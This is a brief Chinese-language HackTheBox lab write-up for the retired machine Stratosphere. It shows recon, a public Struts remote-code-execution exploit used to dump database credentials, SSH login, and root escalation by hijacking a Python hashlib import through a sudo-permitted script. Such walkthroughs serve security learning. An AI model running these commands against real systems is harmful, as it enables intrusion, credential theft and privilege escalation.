HTB-靶機-Stratosphere
阿新 • • 發佈:2020-12-07
本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關
靶機是作者購買VIP使用退役靶機操作,顯示IP地址為10.10.10.64
本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描
執行命令autorecon 10.10.10.64 -o ./Stratosphere-autorecon
訪問web應用
沒找到有用的資訊,再爆破下目錄發現如下資訊
看url地址顯示猜測有Struts命令執行漏洞,搜尋了下對應的exploit測試如下
可以執行命令,有了如下操作
python 41570.py http://10.10.10.64/Monitoring/example/Welcome.action 'mysql -u admin -p admin -e "use users;select * from accounts"'
得到了資料庫密碼,試了下ssh登入
執行sudo -l得到如下
可以直接提權了,執行test.py的時候載入了hashlib,通過修改hashlib直接讀取root.txt
echo 'import os; os.system("cat /root/root.txt")' > hashlib.py